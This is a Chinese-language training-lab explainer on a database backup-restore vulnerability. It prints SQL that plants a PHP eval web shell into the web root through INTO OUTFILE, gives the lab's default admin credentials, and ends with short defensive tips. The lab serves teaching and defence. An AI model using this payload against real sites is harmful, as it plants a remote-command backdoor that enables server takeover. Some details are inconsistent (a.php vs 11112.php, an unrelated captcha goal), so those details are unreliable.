靶场科普 | 数据库备份恢复漏洞靶场发表时间:2022-03-21 18:00 本文由“东塔网络安全学院”总结归纳 ![]() 靶场介绍 数据库备份恢复漏洞靶场 ![]() 今天,给大家介绍一下“东塔攻防世界”其中的一个靶场:“数据库备份恢复漏洞靶场”。 一、实验介绍 通过对数据库可以下载备份文件到本地,再给该文件添加sql代码上传来实现注入 如: drop table if exists emlog_shell;// 如果存在emlog_shell表就把它删了; create table emlog_shell( `cmd` longtext not null);// 重新创建一张表emlog_shell,而且只有字段cmd; insert into emlog_shell values ( "<?php @eval($_POST[cmd]);?>");// longtext类型且不为空,并且插入字段值,构成一句话木马; select cmd from emlog_shell into outfile ' /var/www/html/11112.php ';// 然后将cmd的值读出来outfle文件输出流输出到/var/www/html/a.php drop table if exists emlog_shell;// emlog_shell表删了 ![]() 注意事项,后台登录地址为:URL中直接后面加入 /admin 进入后台 后台登录账号和密码root ,123456 ![]() 二、实验目的 1、了解验证码绕过的相关知识 三、实验步骤 根据解题思路完成数据库备份漏洞的利用 四、防御方法 1. 禁止下载备份文件 2. 对上传的sql文件严格检测,过滤一些关键字,包括特殊字符等 |